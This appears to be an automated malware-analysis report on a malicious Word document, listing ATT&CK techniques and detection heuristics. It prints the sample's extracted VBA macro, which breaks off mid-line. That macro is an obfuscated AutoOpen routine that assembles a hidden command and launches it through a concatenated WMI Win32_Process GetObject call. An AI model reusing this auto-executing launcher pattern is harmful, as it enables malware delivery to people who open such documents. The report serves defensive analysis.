Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1059 Command and Scripting Interpreter
The sample contains legacy WordBasic auto-exec markers, and a critical heuristic fired for a VBA WMI Win32_Process launcher. This indicates the document is designed to execute arbitrary code via WMI. The GetObject call further supports the execution of external processes. Together, these indicators strongly suggest downloader or dropper functionality.
Heuristics (7)

- ClamAV: Doc.Malware.Smpowloadbb-6965612-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Smpowloadbb-6965612-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA WMI Win32_Process launcher (critical, OLE_VBA_WMI_PROCESS_CREATE): VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6747 bytes |

SHA-256: 46fafa4706f53f4aeb75609e9fa505701391a177d5089ba9b7d3844d8bf04b54
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "Z74186"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "w22673"
Attribute VB_Base = "0{EE749F86-F1A1-404C-BADD-4CB7021EB7F0}{0730E178-EC20-41FD-809E-CFF6CC65A68C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "q25131_"
Attribute VB_Name = "p291855"
Attribute VB_Name = "p21593"
Attribute VB_Base = "0{81CF2846-C84D-44B3-B2A7-367212CCF2A7}{7CD0F323-4443-4284-8822-81079536DA65}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "a40085"
Function Q3353823(j1_0276)
While Z70179 And G188_5
'U08466G544319z38929p74509
'Q_9088Y_358_1i_203310t9_4743_
'A43344R707273L18817_2j826102
Wend
While Q75518 And M754993
'G3982_4N3_3720f281337W35874
'j_53710X7_1359R011729S3787336
'J120709O3984_O7545_J99_909
Wend
While H127_4 And c8161878
'b7246616X002234w4568490w9_641
'q7766214w4956036Z_8834a5717466
'r4548__a4239_5v_339393j6__8989
Wend
Set Q3353823 = CVar(j1_0276)
While A55618 And i40325_
'R026_984J611_92O72057r52165
'p2617929C83_51I13_8_0w1581332
'N866474q0_2_03r572__2S_519950
Wend
While k455_33 And h39438
'i_4909j94982F33503U0192497
'u2700743t086073h556651C5_9084
'M5817__L707192b826000a2__2811
Wend
While W37120_ And P4114092
'u077596_d6460_67k4_717l6_9512
'h237_225j25434c01693R_9134
'u56893Q7_443O978925l037893
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While Y0329034 And W903_3
'N_36534Q475_796w346169i36679_4
'X_922_w632988w52_70X00_71
'a97222A00666s7_04102i23646
Wend
While u8_7814 And V37718
'v60796v694834l70266B70756
'z5970231Z6362077R15113A9618680
'J749091b5__03z186855N598944
Wend
Call V0001425
While T7888_1 And B870974
'j_42075X96432S494747i74732
'A533813f8286662Q4_88_91h3798392
'R68_8_1E05135l64__5V24138
Wend
While F6396342 And b2_5321
'm9__6978h042143n9865367M298_1
'b91071a2_02_6G1368_h130252
'k09_37l4740386z989905_l499914
Wend
End Sub
Attribute VB_Name = "i971_9_"
Function V0001425()
On Error Resume Next
While G706634 And i_348413
'U780_61c638603D06475G540_031
'V8__53V538556m02143j7777_7
'r1326351f51_41M0_26_6O_068377
Wend
While z256034 And I3850_
'D7626388Y003987_w8_86599r08850
'V_89460u61004S80725_2d2300217
'I550_3Y6_760h04798P51_809
Wend
While o984308_ And v11298_
'w550_81n14645C85_1_q370632
'f5508722R15982M37_576Z086077
'c34130a555_807R8_0562u85501
Wend
t3239169 = w22673.c85765_.PasswordChar + p21593.s51328 + w22673.c85765_.ControlTipText + p21593.T9062956 + w22673.c85765_.ControlTipText + w22673.c85765_.ControlSource + p21593.N956516 + w22673.c85765_.ControlSource + w22673.c85765_.ControlSource + p21593.I36286 + w22673.c85765_.PasswordChar + p21593.p322885 + w22673.c85765_.ControlSource
While W5296121 And O1070_
'W7013950E73024B78_05X84558
'F6053548v8050618K59571c3955597
'A8416_S1904990p6031723N574_08
Wend
While j00389 And V_296494
'p_6001A_90306L80913G9012985
'T98_9449b83452Q6991_9S03268
'P53076S55678_3C18993z03_11
Wend
Set w03423 = Q3353823(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While C357636 And w6127_
'f59652Q4270_w390864K_40165_
'A_181932n41753z61178O53097
's70781X01_085P__9_5s69__73
Wend
While b454240 And k60476
'd60048K33961_9o693591R8_628
'J09387E8507627I7412925N92139
'z2205341i96445w28_131S7570937
Wend
w03423.C
```

... (truncated)